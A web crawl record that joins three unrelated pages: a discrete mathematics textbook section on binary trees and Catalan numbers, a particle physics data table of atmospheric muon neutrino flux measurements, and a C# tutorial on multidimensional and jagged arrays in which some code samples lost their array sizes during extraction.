{"ft_lang_label":"__label__en","ft_lang_prob":0.9370835,"math_prob":0.9714651,"size":3496,"snap":"2022-40-2023-06","text_gpt3_token_len":778,"char_repetition_ratio":0.11340206,"word_repetition_ratio":0.02020202,"special_character_ratio":0.21710527,"punctuation_ratio":0.09552239,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9984733,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22],"im_url_duplicate_count":[null,4,null,4,null,4,null,7,null,4,null,4,null,4,null,4,null,4,null,4,null,9,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-04T21:38:47Z\",\"WARC-Record-ID\":\"<urn:uuid:066422c7-fdf7-4c45-814b-db610ce16981>\",\"Content-Length\":\"107799\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d4abf8b2-c8e1-4062-bf4e-5651ef951477>\",\"WARC-Concurrent-To\":\"<urn:uuid:320c5781-06a6-4cc5-b211-52e79d83e3c4>\",\"WARC-IP-Address\":\"85.25.214.207\",\"WARC-Target-URI\":\"http://datasciencehack.com/blog/2020/09/30/back-propagation-of-lstm/\",\"WARC-Payload-Digest\":\"sha1:MURQIIKPEGUY5PGGMV4VVZNH3KA3OPJS\",\"WARC-Block-Digest\":\"sha1:HOFIVCMMRG5BYOX62FUX3HWUYW23SQXP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500154.33_warc_CC-MAIN-20230204205328-20230204235328-00844.warc.gz\"}"}
https://faculty.uml.edu/klevasseur/ads/s-binary-trees.html
[ "", null, "# Applied Discrete Structures\n\n## Section10.4Binary Trees\n\n### Subsection10.4.1Definition of a Binary Tree\n\nAn ordered rooted tree is a rooted tree whose subtrees are put into a definite order and are, themselves, ordered rooted trees. An empty tree and a single vertex with no descendants (no subtrees) are ordered rooted trees.\nThe trees in Figure 10.4.2 are identical rooted trees, with root 1, but as ordered trees, they are different.\nIf a tree rooted at $$v$$ has $$p$$ subtrees, we would refer to them as the first, second,..., $$p^{th}$$ subtrees. There is a subtle difference between certain ordered trees and binary trees, which we define next.\n\n#### Definition10.4.3.Binary Tree.\n\n1. A tree consisting of no vertices (the empty tree) is a binary tree\n2. A vertex together with two subtrees that are both binary trees is a binary tree. The subtrees are called the left and right subtrees of the binary tree.\nThe difference between binary trees and ordered trees is that every vertex of a binary tree has exactly two subtrees (one or both of which may be empty), while a vertex of an ordered tree may have any number of subtrees. But there is another significant difference between the two types of structures. The two trees in Figure 10.4.4 would be considered identical as ordered trees. However, they are different binary trees. Tree (a) has an empty right subtree and Tree (b) has an empty left subtree.\n\n### Subsection10.4.2Traversals of Binary Trees\n\nThe traversal of a binary tree consists of visiting each vertex of the tree in some prescribed order. Unlike graph traversals, the consecutive vertices that are visited are not always connected with an edge. The most common binary tree traversals are differentiated by the order in which the root and its subtrees are visited. The three traversals are best described recursively and are:\nPreorder Traversal:\n1. Visit the root of the tree.\n2. Preorder traverse the left subtree.\n3. Preorder traverse the right subtree.\nInorder Traversal:\n1. Inorder traverse the left subtree.\n2. Visit the root of the tree.\n3. Inorder traverse the right subtree.\nPostorder Traversal:\n1. Postorder traverse the left subtree.\n2. Postorder traverse the right subtree.\n3. Visit the root of the tree.\nAny traversal of an empty tree consists of doing nothing.\nFor the tree in Figure 10.4.7, the orders in which the vertices are visited are:\n• A-B-D-E-C-F-G, for the preorder traversal.\n• D-B-E-A-F-C-G, for the inorder traversal.\n• D-E-B-F-G-C-A, for the postorder traversal.\nBinary Tree Sort. Given a collection of integers (or other objects than can be ordered), one technique for sorting is a binary tree sort. If the integers are $$a_1\\text{,}$$ $$a_2, \\ldots \\text{,}$$ $$a_n\\text{,}$$ $$n\\geq 1\\text{,}$$ we first execute the following algorithm that creates a binary tree:\nIf the integers to be sorted are 25, 17, 9, 20, 33, 13, and 30, then the tree that is created is the one in Figure 10.4.9. The inorder traversal of this tree is 9, 13, 17, 20, 25, 30, 33, the integers in ascending order. In general, the inorder traversal of the tree that is constructed in the algorithm above will produce a sorted list. The preorder and postorder traversals of the tree have no meaning here.\n\n### Subsection10.4.3Expression Trees\n\nA convenient way to visualize an algebraic expression is by its expression tree. Consider the expression\n\\begin{equation*} X = a*b - c/d + e. 
\\end{equation*}\nSince it is customary to put a precedence on multiplication/divisions, $$X$$ is evaluated as $$((a*b) -(c/d)) + e\\text{.}$$ Consecutive multiplication/divisions or addition/subtractions are evaluated from left to right. We can analyze $$X$$ further by noting that it is the sum of two simpler expressions $$(a*b) - (c/d)$$ and $$e\\text{.}$$ The first of these expressions can be broken down further into the difference of the expressions $$a*b$$ and $$c/d\\text{.}$$ When we decompose any expression into $$(\\textrm{left expression})\\textrm{operation} (\\textrm{right expression})\\text{,}$$ the expression tree of that expression is the binary tree whose root contains the operation and whose left and right subtrees are the trees of the left and right expressions, respectively. Additionally, a simple variable or a number has an expression tree that is a single vertex containing the variable or number. The evolution of the expression tree for expression $$X$$ appears in Figure 10.4.10.\n1. If we intend to apply the addition and subtraction operations in $$X$$ first, we would parenthesize the expression to $$a*(b - c)/(d + e)\\text{.}$$ Its expression tree appears in Figure 10.4.12(a).\n2. The expression trees for $$a^2-b^2$$ and for $$(a + b)*(a - b)$$ appear in Figure 10.4.12(b) and Figure 10.4.12(c).\nThe three traversals of an operation tree are all significant. A binary operation applied to a pair of numbers can be written in three ways. One is the familiar infix form, such as $$a + b$$ for the sum of $$a$$ and $$b\\text{.}$$ Another form is prefix, in which the same sum is written $$+a b\\text{.}$$ The final form is postfix, in which the sum is written $$a b+\\text{.}$$ Algebraic expressions involving the four standard arithmetic operations $$(+,-,*, \\text{and} /)$$ in prefix and postfix form are defined as follows:\nThe connection between traversals of an expression tree and these forms is simple:\n1. The preorder traversal of an expression tree will result in the prefix form of the expression.\n2. The postorder traversal of an expression tree will result in the postfix form of the expression.\n3. The inorder traversal of an operation tree will not, in general, yield the proper infix form of the expression. If an expression requires parentheses in infix form, an inorder traversal of its expression tree has the effect of removing the parentheses.\nThe preorder traversal of the tree in Figure 10.4.10 is $$+-*ab/cd e\\text{,}$$ which is the prefix version of expression $$X\\text{.}$$ The postorder traversal is $$ab*cd/-e+\\text{.}$$ Note that since the original form of $$X$$ needed no parentheses, the inorder traversal, $$a*b-c/d+e\\text{,}$$ is the correct infix version.\n\n### Subsection10.4.4Counting Binary Trees\n\nWe close this section with a formula for the number of different binary trees with $$n$$ vertices. The formula is derived using generating functions. 
Although the complete details are beyond the scope of this text, we will supply an overview of the derivation in order to illustrate how generating functions are used in advanced combinatorics.\nLet $$B(n)$$ be the number of different binary trees of size $$n$$ ($$n$$ vertices), $$n \\geq 0\\text{.}$$ By our definition of a binary tree, $$B(0) = 1\\text{.}$$ Now consider any positive integer $$n + 1\\text{,}$$ $$n \\geq 0\\text{.}$$ A binary tree of size $$n + 1$$ has two subtrees, the sizes of which add up to $$n\\text{.}$$ The possibilities can be broken down into $$n + 1$$ cases:\nCase 0: Left subtree has size 0; right subtree has size $$n\\text{.}$$\nCase 1: Left subtree has size 1; right subtree has size $$n - 1\\text{.}$$\n$$\\quad \\quad$$$$\\vdots$$\nCase $$k\\text{:}$$ Left subtree has size $$k\\text{;}$$ right subtree has size $$n - k\\text{.}$$\n$$\\quad \\quad$$$$\\vdots$$\nCase $$n\\text{:}$$ Left subtree has size $$n\\text{;}$$ right subtree has size 0.\nIn the general Case $$k\\text{,}$$ we can count the number of possibilities by multiplying the number of ways that the left subtree can be filled, $$B(k)\\text{,}$$ by the number of ways that the right subtree can be filled. $$B(n-k)\\text{.}$$ Since the sum of these products equals $$B(n + 1)\\text{,}$$ we obtain the recurrence relation for $$n\\geq 0\\text{:}$$\n\\begin{equation*} \\begin{split} B(n+1) &= B(0)B(n)+ B(1)B(n-1)+ \\cdots + B(n)B(0)\\\\ &=\\sum_{k=0}^n B(k) B(n-k) \\end{split} \\end{equation*}\nNow take the generating function of both sides of this recurrence relation:\n\\begin{gather} \\sum_{n=0}^{\\infty } B(n+1) z^n= \\sum_{n=0}^{\\infty } \\left(\\sum_{k=0}^n B(k) B(n-k)\\right)z^n\\tag{10.4.1} \\end{gather}\nor\n\\begin{gather} G(B\\uparrow ; z) = G(B*B; z) = G(B; z) ^2\\tag{10.4.2} \\end{gather}\nRecall that $$G(B\\uparrow;z) =\\frac{G(B;z)-B(0)}{z}=\\frac{G(B;z)-1}{z}$$ If we abbreviate $$G(B; z)$$ to $$G\\text{,}$$ we get\n\\begin{equation*} \\frac{G-1}{z}= G^2 \\Rightarrow z G^2- G + 1 = 0 \\end{equation*}\nUsing the quadratic equation we find two solutions:\n\\begin{gather} G_1 = \\frac{1+\\sqrt{1-4 z}}{2z} \\textrm{ and}\\tag{10.4.3}\\\\ G_2 = \\frac{1-\\sqrt{1-4 z}}{2z}\\tag{10.4.4} \\end{gather}\nThe gap in our derivation occurs here since we don’t presume a knowledge of calculus. If we expand $$G_1$$ as an extended power series, we find\n\\begin{gather} G_1 = \\frac{1+\\sqrt{1-4 z}}{2z}=\\frac{1}{z}-1-z-2 z^2-5 z^3-14 z^4-42 z^5+\\cdots\\tag{10.4.5} \\end{gather}\nThe coefficients after the first one are all negative and there is a singularity at 0 because of the $$\\frac{1}{z}$$ term. However if we do the same with $$G_2$$ we get\n\\begin{gather} G_2= \\frac{1-\\sqrt{1-4 z}}{2z} = 1+z+2 z^2+5 z^3+14 z^4+42 z^5+\\cdots\\tag{10.4.6} \\end{gather}\nFurther analysis leads to a closed form expression for $$B(n)\\text{,}$$ which is\n\\begin{equation*} B(n) = \\frac{1}{n+1}\\left( \\begin{array}{c} 2n \\\\ n \\\\ \\end{array} \\right) \\end{equation*}\nThis sequence of numbers is often called the Catalan numbers. For more information on the Catalan numbers, see the entry A000108 in The On-Line Encyclopedia of Integer Sequences 1 .\n\n### Subsection10.4.5SageMath Note - Power Series\n\nIt may be of interest to note how the extended power series expansions of $$G_1$$ and $$G_2$$ are determined using Sage. In Sage, one has the capability of being very specific about how algebraic expressions should be interpreted by specifying the underlying ring. 
This can make working with various algebraic expressions a bit more confusing to the beginner. Here is how to get a Laurent expansion for $$G_1$$ above.\nR.<z>=PowerSeriesRing(ZZ,'z')\nG1=(1+sqrt(1-4*z))/(2*z)\nG1\n\nThe first Sage expression above declares a structure called a ring that contains power series. We are not using that whole structure, just a specific element, G1. So the important thing about this first input is that it establishes z as being a variable associated with power series over the integers. When the second expression defines the value of G1 in terms of z, it is automatically converted to a power series.\nThe expansion of $$G_2$$ uses identical code, and its coefficients are the values of $$B(n)\\text{.}$$\nR.<z>=PowerSeriesRing(ZZ,'z')\nG2=(1-sqrt(1-4*z))/(2*z)\nG2\n\nIn Chapter 16 we will introduce rings and will be able to take further advantage of Sage’s capabilities in this area.\n\n### Exercises10.4.6Exercises\n\n#### 1.\n\nDraw the expression trees for the following expressions:\n1. $$\\displaystyle a(b + c)$$\n2. $$\\displaystyle a b + c$$\n3. $$\\displaystyle a b + a c$$\n4. $$\\displaystyle b b - 4 a c$$\n5. $$\\displaystyle \\left(\\left(a_3 x + a_2\\right)x +a_1\\right)x + a_0$$\n\n#### 2.\n\nDraw the expression trees for\n1. $$\\displaystyle \\frac{x^2-1}{x-1}$$\n2. $$\\displaystyle x y + x z + y z$$\n\n#### 3.\n\nWrite out the preorder, inorder, and postorder traversals of the trees in Exercise 1 above.\n\\begin{equation*} \\begin{array}{cccc} & \\text{Preorder} & \\text{Inorder} & \\text{Postorder} \\\\ (a) & \\cdot a + b c & a\\cdot b+c & a b c + \\cdot \\\\ (b) & +\\cdot a b c & a\\cdot b+c & a b\\cdot c+ \\\\ (c) & +\\cdot a b\\cdot a c & a\\cdot b+a\\cdot c & a b\\cdot a c\\cdot + \\\\ \\end{array} \\end{equation*}\n\n#### 4.\n\nVerify the formula for $$B(n)\\text{,}$$ $$0 \\leq n \\leq 3$$ by drawing all binary trees with three or fewer vertices.\n\n#### 5.\n\n1. Draw a binary tree with seven vertices and only one leaf. Your answer won’t be unique. How many different possible answers are there?\n2. Draw a binary tree with seven vertices and as many leaves as possible.\nThere are $$2^6=64$$ different possible answers to part (a). The answer to (b) is unique.\n\n#### 6.\n\nProve that the maximum number of vertices at level $$k$$ of a binary tree is $$2^k$$ and that a tree with that many vertices at level $$k$$ must have $$2^{k+1}-1$$ vertices.\n\n#### 7.\n\nProve that if $$T$$ is a full binary tree, then the number of leaves of $$T$$ is one more than the number of internal vertices (non-leaves).\nSolution 1:\nBasis: A binary tree consisting of a single vertex, which is a leaf, satisfies the equation $$\\text{leaves} = \\textrm{internal vertices} + 1$$\nInduction:Assume that for some $$k\\geq 1\\text{,}$$ all full binary trees with $$k$$ or fewer vertices have one more leaf than internal vertices. Now consider any full binary tree with $$k+1$$ vertices. Let $$T_A$$ and $$T_B$$ be the left and right subtrees of the tree which, by the definition of a full binary tree, must both be full. 
If $$i_A$$ and $$i_B$$ are the numbers of internal vertices in $$T_A$$ and $$T_B\\text{,}$$ and $$j_A$$ and $$j_B$$ are the numbers of leaves, then $$j_A=i_A+1$$ and $$j_B=i_B+1\\text{.}$$ Therefore, in the whole tree,\n\\begin{equation*} \\begin{split} \\textrm{the number of leaves} & =j_A+j_B\\\\ &=\\left(i_A+1\\right)+\\left(i_B+1\\right)\\\\ &=\\left(i_A+i_B+1\\right)+1\\\\ &=(\\textrm{number of internal vertices})+1 \\end{split} \\end{equation*}\nSolution 2:\nImagine building a full binary tree starting with a single vertex. By continuing to add leaves in pairs so that the tree stays full, we can build any full binary tree. Our starting tree satisfies the condition that the number of leaves is one more than the number of internal vertices . By adding a pair of leaves to a full binary tree, an old leaf becomes an internal vertex, increasing the number of internal vertices by one. Although we lose a leaf, the two added leaves create a net increase of one leaf. Therefore, the desired equality is maintained.\n\n#### 8.\n\nThere is a one to one correspondence between ordered rooted trees and binary trees. If you start with an ordered rooted tree, $$T\\text{,}$$ you can build a binary tree $$B$$ with an empty right subtree by placing the the root of $$T$$ at the root of $$B\\text{.}$$ Then for every vertex $$v$$ from $$T$$ that has been placed in $$B\\text{,}$$ place it’s leftmost child (if there is one) as $$v$$’s left child in $$B\\text{.}$$ Make $$v$$’s next sibling (if there is one) in $$T$$ the right child in $$B\\text{.}$$", null, "Figure 10.4.18. An ordered rooted tree with root $$r\\text{.}$$\n1. Why will $$B$$ have no right children in this correspondence?\n1. The root of $$B$$ is the root of the corresponding ordered rooted tree, which as no siblings.\n4. The number of ordered rooted trees with $$n$$ vertices is equal to the number of binary trees with $$n-1$$ vertices, $$\\frac{1}{n} \\binom{2(n-1)}{n-1}$$\noeis.org" ]
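The binary tree sort algorithm referenced in the section above appears as an image in the original page and is not visible in this dump. Assuming the usual insertion rule (smaller keys go to the left subtree, larger or equal keys to the right), a short Python sketch reproduces the section's example, the sorted inorder traversal, and the first few Catalan numbers $B(n)$:

```python
from math import comb

class Node:
    def __init__(self, key):
        self.key, self.left, self.right = key, None, None

def insert(root, key):
    # binary tree sort insertion: smaller keys go left, others go right
    if root is None:
        return Node(key)
    if key < root.key:
        root.left = insert(root.left, key)
    else:
        root.right = insert(root.right, key)
    return root

def inorder(root):
    # left subtree, root, right subtree
    return [] if root is None else inorder(root.left) + [root.key] + inorder(root.right)

root = None
for x in [25, 17, 9, 20, 33, 13, 30]:
    root = insert(root, x)
print(inorder(root))   # [9, 13, 17, 20, 25, 30, 33] -- sorted, as the section states

# B(n) = C(2n, n) / (n + 1): the Catalan numbers
print([comb(2 * n, n) // (n + 1) for n in range(6)])   # [1, 1, 2, 5, 14, 42]
```

The printed Catalan values 1, 1, 2, 5, 14, 42 match the coefficients of $G_2$ in equation (10.4.6).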
[ null, "http://discretemath.org/images/ads_v3_cover.jpg", null, "https://faculty.uml.edu/klevasseur/ads/images/fig-ex-ordered-tree.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84586364,"math_prob":0.9997869,"size":15540,"snap":"2023-40-2023-50","text_gpt3_token_len":4433,"char_repetition_ratio":0.16741762,"word_repetition_ratio":0.047829583,"special_character_ratio":0.30032176,"punctuation_ratio":0.10752,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.999984,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-28T09:09:14Z\",\"WARC-Record-ID\":\"<urn:uuid:14b72c27-b8ec-40dc-bf69-8ad390c830a4>\",\"Content-Length\":\"146725\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:23f77997-87fa-4a8c-9b98-abff6329f1e4>\",\"WARC-Concurrent-To\":\"<urn:uuid:06866278-5592-4af5-b8d5-377b3ce516d0>\",\"WARC-IP-Address\":\"129.63.91.88\",\"WARC-Target-URI\":\"https://faculty.uml.edu/klevasseur/ads/s-binary-trees.html\",\"WARC-Payload-Digest\":\"sha1:FPTF4FZULYJL7E3IWLAW572ZRNRIMURM\",\"WARC-Block-Digest\":\"sha1:JDTHOIATXIE45OTYZVLQ4DTWPUHYUBDL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679099281.67_warc_CC-MAIN-20231128083443-20231128113443-00544.warc.gz\"}"}
http://pdglive.lbl.gov/DataBlock.action?node=S067DU1
[ "# R(${{\\boldsymbol \\nu}_{{\\mu}}}$) = (Measured Flux of ${{\\boldsymbol \\nu}_{{\\mu}}}$) $/$ (Expected Flux of ${{\\boldsymbol \\nu}_{{\\mu}}}$) INSPIRE search\n\nVALUE DOCUMENT ID TECN  COMMENT\n• • • We do not use the following data for averages, fits, limits, etc. • • •\n$0.84$ $\\pm0.12$ 1\n 2006\nMINS MINOS atmospheric\n$0.72$ $\\pm0.026$ $\\pm0.13$ 2\n 2001\nMCRO upward through-going\n$0.57$ $\\pm0.05$ $\\pm0.15$ 3\n 2000\nMCRO upgoing partially contained\n$0.71$ $\\pm0.05$ $\\pm0.19$ 4\n 2000\nMCRO downgoing partially contained + upgoing stopping\n$0.74$ $\\pm0.036$ $\\pm0.046$ 5\n 1998\nMCRO Streamer tubes\n6\n 1991\nIMB Water Cherenkov\n7\n 1989\nNUSX\n$0.95$ $\\pm0.22$ 8\n 1981\nBaksan\n$0.62$ $\\pm0.17$\n 1978\nCase Western/UCI\n1  ADAMSON 2006 uses a measurement of 107 total neutrinos compared to an expected rate of $127$ $\\pm13$ without oscillations.\n2  AMBROSIO 2001 result is based on the upward through-going muon tracks with $\\mathit E_{{{\\mathit \\mu}}}>1$ GeV. The data came from three different detector configurations, but the statistics is largely dominated by the full detector run, from May 1994 to December 2000. The total live time, normalized to the full detector configuration, is $6.17$ years. The first error is the statistical error, the second is the systematic error, dominated by the theoretical error in the predicted flux.\n3  AMBROSIO 2000 result is based on the upgoing partially contained event sample. It came from 4.1 live years of data taking with the full detector, from April 1994 to February 1999. The average energy of atmospheric muon neutrinos corresponding to this sample is 4$~$GeV. The first error is statistical, the second is the systematic error, dominated by the 25$\\%$ theoretical error in the rate (20$\\%$ in the flux and 15$\\%$ in the cross section, added in quadrature). Within statistics, the observed deficit is uniform over the zenith angle.\n4  AMBROSIO 2000 result is based on the combined samples of downgoing partially contained events and upgoing stopping events. These two subsamples could not be distinguished due to the lack of timing information. The result came from 4.1 live years of data taking with the full detector, from April 1994 to February 1999. The average energy of atmospheric muon neutrinos corresponding to this sample is 4$~$GeV. The first error is statistical, the second is the systematic error, dominated by the 25$\\%$ theoretical error in the rate (20$\\%$ in the flux and 15$\\%$ in the cross section, added in quadrature). Within statistics, the observed deficit is uniform over the zenith angle.\n5  AMBROSIO 1998 result is for all nadir angles and updates AHLEN 1995 result. The lower cutoff on the muon energy is 1$~$GeV. In addition to the statistical and systematic errors, there is a Monte Carlo flux error (theoretical error) of $\\pm0.13$. With a neutrino oscillation hypothesis, the fit either to the flux or zenith distribution independently yields sin$^22\\theta =1.0$ and $\\Delta \\mathit m{}^{2}\\sim{}$ a few times $10^{-3}$ eV${}^{2}$. However, the fit to the observed zenith distribution gives a maximum probability for $\\chi {}^{2}$ of only 5$\\%$ for the best oscillation hypothesis.\n6  CASPER 1991 correlates showering/nonshowering signature of single-ring events with parent atmospheric-neutrino flavor. 
They find nonshowering ($\\approx{}{{\\mathit \\nu}_{{\\mu}}}$ induced) fraction is $0.41$ $\\pm0.03$ $\\pm0.02$, as compared with expected $0.51$ $\\pm0.05$ (syst).\n7  AGLIETTA 1989 finds no evidence for any anomaly in the neutrino flux. They define $\\rho$ = (measured number of ${{\\mathit \\nu}_{{e}}}$'s)/(measured number of ${{\\mathit \\nu}_{{\\mu}}}$'s). They report $\\rho$(measured)=$\\rho$(expected) = $0.96$ ${}^{+0.32}_{-0.28}$.\n8  From this data BOLIEV 1981 obtain the limit $\\Delta \\mathit m{}^{2}{}\\leq{}$ $6 \\times 10^{-3}$ eV${}^{2}$ for maximal mixing, ${{\\mathit \\nu}_{{\\mu}}}$ $\\nrightarrow$ ${{\\mathit \\nu}_{{\\mu}}}$ type oscillation.\nReferences:\nPR D73 072002 First Observations of Separated Atmospheric ${{\\mathit \\nu}_{{\\mu}}}$ and ${{\\overline{\\mathit \\nu}}_{{\\mu}}}$ Events in the MINOS Detector\n AMBROSIO 2001\nPL B517 59 Matter Effects in Upward Going Muons and Sterile Neutrino Oscillations\n AMBROSIO 2000\nPL B478 5 Low Energy Atmospheric Muon Neutrinos in MACRO\n AMBROSIO 1998\nPL B434 451 Measurement of the Atmospheric Neutrino Induced Upgoing Muon Flux using MACRO\n CASPER 1991\nPRL 66 2561 Measurement of Atmospheric Neutrino Composition with IMB-3\n AGLIETTA 1989\nEPL 8 611 Experimental Study of Atmospheric Neutrino Flux in the NUSEX Experiment\n BOLIEV 1981\nSJNP 34 787 Limitations on Parameters of Neutrino Oscillations According to Data of Baksan Underground Telescope\n CROUCH 1978\nPR D18 2239 Cosmic Ray Muon Fluxes Deep Underground: Intensity vs Depth, and the Neutrino Induced Component" ]
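Several footnotes above quote a 25% theoretical error built from a 20% flux error and a 15% cross-section error "added in quadrature". A two-line check of that arithmetic; the second line only illustrates the quadrature convention applied to the quoted stat and syst errors of AMBROSIO 2001, not something the table itself reports.

```python
from math import hypot, sqrt

print(hypot(0.20, 0.15))         # 0.25 -> the quoted 25% theoretical error
print(sqrt(0.026**2 + 0.13**2))  # ~0.133 -> stat and syst combined in quadrature (illustration only)
```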
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8497691,"math_prob":0.9962976,"size":3561,"snap":"2020-24-2020-29","text_gpt3_token_len":1062,"char_repetition_ratio":0.11639021,"word_repetition_ratio":0.284153,"special_character_ratio":0.3386689,"punctuation_ratio":0.1235119,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99508613,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-03T14:08:14Z\",\"WARC-Record-ID\":\"<urn:uuid:67f038f4-4726-41bb-9a4c-ab9737d33fe2>\",\"Content-Length\":\"48388\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:200b01bc-d39c-4334-866c-b7af8894a8bc>\",\"WARC-Concurrent-To\":\"<urn:uuid:e68d8375-cd22-46f4-8463-88626bf564c1>\",\"WARC-IP-Address\":\"128.3.28.110\",\"WARC-Target-URI\":\"http://pdglive.lbl.gov/DataBlock.action?node=S067DU1\",\"WARC-Payload-Digest\":\"sha1:WWZKZXKFKNEDZ5BP3ENVMCJQ5GRAMAXN\",\"WARC-Block-Digest\":\"sha1:AGJFZ7US4B4CPLI5OBRN5IPJ67YLLJJ6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655882051.19_warc_CC-MAIN-20200703122347-20200703152347-00012.warc.gz\"}"}
https://www.softwaretestinghelp.com/c-sharp/multi-dimensional-and-jagged-arrays-in-csharp/
[ "# MultiDimensional Arrays And Jagged Arrays In C#\n\nThis Tutorial Explains All About Multidimensional Arrays & Jagged Arrays in C# With Examples. Multidimensional arrays are also known as Rectangular Arrays:\n\nWe explored all about Arrays and Single Dimensional Arrays in our previous tutorial.\n\nIn this tutorial, we will learn about Multi-Dimensional Arrays and Jagged Arrays in C# in detail along with examples.\n\n=> Explore Our In-Depth C# Training Tutorials Here\n\n## C# Multi-Dimensional Arrays\n\nMulti-dimensional arrays are also known as rectangular arrays. Multi-dimensional arrays can be further classified into two or three-dimensional arrays.\n\nUnlike single-dimensional arrays where data is stored in a liner sequential manner, a multi-dimensional array stores data in tabular format i.e. in the form of rows and columns. This tabular arrangement of data is also known as a matrix.\n\n### 2-Dimensional Arrays\n\nThe simplest form of multidimensional array is a two-dimensional array. A two-dimensional array can be formed by stacking several one-dimensional arrays together. The following figure will help in understanding the concept better.", null, "The above image is a graphical representation of how the 2-dimensional array looks like. It is denoted by having a row and column. Hence, each building block of the two-dimensional array will be made up of the index representing row number and column number.\n\nMultidimensional arrays are declared like the single-dimensional array with the only difference being the inclusion of comma inside the square bracket to represent rows, columns, etc.\n\n`string[ , ] strArray = new string[2,2];`\n\nNow, let’s have a look at an example to initialize a two-dimensional array.\n\nA 2-D array is declared by\n\n```string [ , ] fruitArray = new string [2,2] {\n{“apple” , “mango”} , /* values for row indexed by 0 */\n{“orange”, “banana”} , /* values for row indexed by 1 */\n};\n```\n\nFor Example, let’s say if my array element has “i” row and “j” column then we can access it by using the following index array[i, j].\n\n```string [ , ] fruitArray = new string [2,2] {\n{“apple” , “mango”} , /* values for row indexed by 0 */\n{“orange”, “banana”} , /* values for row indexed by 1 */\n};\n/* output for the elements present in array*/\nfor (int i = 0; i &lt; 2; i++) {\nfor (int j = 0; j &lt; 2; j++) {\nConsole.WriteLine(\"fruitArray[{0},{1}] = {2}\", i, j, fruitArray[i,j]);\n}\n}\nConsole.ReadKey();\n```\n\nThe output of the following program will be:\n\nfruitArray[0,0] = apple\nfruitArray[0,1] = mango\nfruitArray[1,0] = orange\nfruitArray[1,1] = banana\n\nExplanation:\n\nThe first part of the program is the Array declaration. We declared a string type array of row size 2 and column size 2. In the next part, we tried to access the array using for loop.\n\nWe have used a nested for loop for accessing the values. The outer for loop provides the row number i.e. it will start with the “zeroth” row and then move ahead. The inner for loop defines the column number. With each row number passed by the first for loop, the second for loop will assign a column number and access the data from the cell.\n\n## Jagged Arrays In C#\n\nAnother type of array that is available with C# is a Jagged Array. A jagged array can be defined as an array consisting of arrays. 
The jagged arrays are used to store arrays instead of other data types.\n\nA jagged array can be initialized by using two square brackets, where the first square bracket denotes the size of the array that is being defined and the second bracket denotes the array dimension that is going to be stored inside the jagged array.\n\n### Jagged Array Declaration\n\nAs discussed a jagged array can be initialized by the following syntax:\n\n`string[ ][ ] stringArr = new string[ ];`\n\nA jagged array can store multiple arrays with different lengths. We can declare an array of length 2 and another array of length 5 and both of these can be stored in the same jagged array.\n\n### Filling Element Inside Jagged Array\n\nLets first initialize a Jagged Array.\n\n```arrayJag = new string ;\narrayJag = new string ;```\n\nIn the above example, we have initialized a string type jagged array with index “0” and “1” containing an array of size defined inside the square bracket. The 0th index contains a string type array of length 2 and the index “1” contains a string type array of length 3.\n\nThis was how we initialize an array. Let’s now initialize and put values inside a jagged array.\n\n```arrayJag = new string {“apple”, “mango”};\narrayJag = new string {“orange”, “banana”, “guava”};```\n\nHence, as shown in the above example, the jagged array can also be declared with values. To add values, we place a curly bracket after the declared jagged array with the list of values.\n\nIt is also possible to initialize the jagged array while declaring it.\n\nThis can be done by using the following approach.\n\n```string[][] jaggedArray = new string [] {\nnew string[] {“apple”, “mango”},\nnew string[] {“orange”, “banana”, “guava”}\n};\n```\n\nIn the above example, we defined a Jagged array with name “jaggedArray” with size 2 and then inside the curly bracket we defined and declared its constituent arrays.\n\n### Retrieve Data From A Jagged Array\n\nUntil now we learned about putting data inside a Jagged array. Now, we will discuss the method to retrieve data from a Jagged array. We will use the same example that we discussed earlier and will try to retrieve all the data from that array.\n\n```string[][] jaggedArray = new string [] {\nnew string[] {“apple”, “mango”},\nnew string[] {“orange”, “banana”, “guava”}\n};\n/* retrieve value from each array element */\nfor (int i = 0; i < jaggedArray.Length; i++) {\nfor (int j = 0; j < jaggedArray[i].Length; j++) {\nConsole.Write(jaggedArray[i][j]+ “ ”);\n}\nConsole.WriteLine();\n}\nConsole.ReadKey();\n```\n\nThe output of the following program will be:\n\napple mango\norange banana guava\n\nExplanation:\n\nWe used two for loops to transverse through the elements. The first for loop defined the index for the Jagged array. Another nested for loop was used to transverse through the array present in the given jagged array index, then we printed the result to console.\n\nPoints to Remember:\n\n• A jagged array is an array of arrays. i.e. it stores arrays as its values.\n• The jagged array will throw out of range exception if the specified index doesn’t exist.\n\n## Conclusion\n\nIn this tutorial, we learned about Jagged and Multidimensional arrays in C#. We learned how to declare and initialize a two-dimensional array. We also created a simple program to retrieve data from a two-dimensional array.\n\nThen we discussed in detail about Jagged array, which is an array of arrays.\n\nA Jagged array is unique in itself as it stores arrays as values. 
Jagged arrays are quite similar to other arrays with the only difference being the type of value it stores.\n\n=> FREE C# Training Tutorials For All" ]
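For comparison, here is the article's fruit example re-expressed with Python lists, kept in the single language used for the added examples in this dump. Python does not distinguish rectangular from jagged storage at the type level the way C# does (`[,]` versus `[][]`), but the access patterns and the printed output are the same as in the article's two snippets.

```python
# Rectangular ("multidimensional") layout: every row has the same length.
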